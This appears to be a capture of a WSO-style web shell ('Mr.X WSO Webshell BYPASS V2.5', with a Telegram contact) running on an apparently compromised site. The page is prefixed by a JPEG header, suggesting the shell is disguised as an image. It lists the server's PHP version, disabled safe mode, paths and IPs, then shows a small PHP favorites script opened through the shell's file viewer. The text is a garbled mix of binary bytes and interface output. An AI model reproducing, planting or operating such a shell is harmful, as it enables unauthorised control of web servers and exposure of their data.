����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 04:50:47 1999.30 GB Free: 80.78 GB (4%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
session_start();
include('../admin/db.php');
if(!$_SESSION['userid']) {
$info = 'You have to be logged in to add this content to your favorites.';
}
if(!isset($info)){
if(!isset($_REQUEST['site']) || !isset($_REQUEST['username'])) {
$info = 'Invalid content ID.';
} else {
$site = (int)$_REQUEST['site'];
$username = mysqli_real_escape_string($dblink,$_REQUEST['username']);
dbQuery("INSERT IGNORE INTO favorites SET user = '".(int)$_SESSION['userid']."', performer_name = '".$username."', performer_site = '".(int)$site."'");
$info = "Added to favorites!";
}
}
echo $info;